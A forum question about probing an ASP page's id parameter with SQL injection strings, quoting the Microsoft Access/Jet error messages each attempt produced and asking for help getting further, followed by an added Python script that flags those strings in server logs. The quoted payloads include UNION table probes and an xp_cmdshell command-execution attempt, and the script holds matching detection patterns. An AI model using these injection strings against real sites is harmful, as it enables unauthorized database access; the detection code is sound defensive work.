I originally tested for a possible vulnerability by trying default.asp?id=| and got the error:
[Microsoft][ODBC Microsoft Access Driver] Too few parameters. Expected 1.
I figured from the error that correct handling wasn't in place, so I then attempted some basic strings, such as: default.asp?id=30+UNION+exec+master..xp_cmdshell+'dir'; which resulted in:
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine could not find the object 'master'. Make sure the object exists and that you spell its name and the path name correctly.
Another was: default.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES; ("--" were giving me all the same error, so I figured I'd end it with a semicolon.) which resulted in:
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\WINNT\system32\INFORMATION_SCHEMA.mdb'.
Finally, I played with some possible table names and found CONFIG was valid, but when I issued the command: default.asp?id=4960 UNION SELECT TOP 1 TABLE_NAME FROM CONFIG; which resulted in:
[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.
I have Googled this pretty extensively, with no luck. No helpful information on the errors, and looking for other SQL injection info was just yielding the same strings and types of attacks. I've played with it some, seeing that -- doesn't always work, but termination with a semicolon will, etc.
Could anyone explain some of these errors, or if you've been stuck here before, let me know what you found out?
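
Added example, not part of the original post: a defender-side triage of the request strings quoted above, run over constructed request targets as they might appear in a web server log. It assumes `id` is meant to be an integer (the post only shows numeric values such as 30); the function and marker names are illustrative.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Triage markers, taken from the request strings quoted in the post above.
MARKERS = {
    "union": re.compile(r"\bunion\b", re.I),
    "xp_cmdshell": re.compile(r"xp_cmdshell", re.I),
    "schema_probe": re.compile(r"information_schema", re.I),
    "terminator": re.compile(r";|--"),
}

def classify_id(value):
    """Return the reasons an `id` value is suspicious (empty list = clean)."""
    # Assumption: a legitimate id is a short run of digits and nothing else.
    if re.fullmatch(r"\d{1,10}", value):
        return []
    # The allow-list failure is the real signal; markers only help triage.
    reasons = ["non_numeric"]
    reasons += [name for name, rx in MARKERS.items() if rx.search(value)]
    return reasons

def scan(request_targets, param="id"):
    """Map each request target whose `param` is suspicious to its reasons."""
    hits = {}
    for target in request_targets:
        for pair in urlsplit(target).query.split("&"):
            name, _, raw = pair.partition("=")
            if name != param:
                continue
            # Decode %xx and '+' so encoded and plain forms are treated alike.
            reasons = classify_id(unquote_plus(raw))
            if reasons:
                hits[target] = reasons
    return hits

# Constructed sample: request targets built from the strings in the post.
SAMPLE = [
    "/default.asp?id=30",
    "/default.asp?id=|",
    "/default.asp?id=30+UNION+exec+master..xp_cmdshell+'dir';",
    "/default.asp?id=10%20UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES;",
    "/default.asp?id=4960%20UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20CONFIG;",
]

if __name__ == "__main__":
    for target, reasons in scan(SAMPLE).items():
        print(target, "->", ", ".join(reasons))
```

The same integer check belongs in the page itself before the value reaches the query, which stops every request above at validation instead of at the ODBC driver.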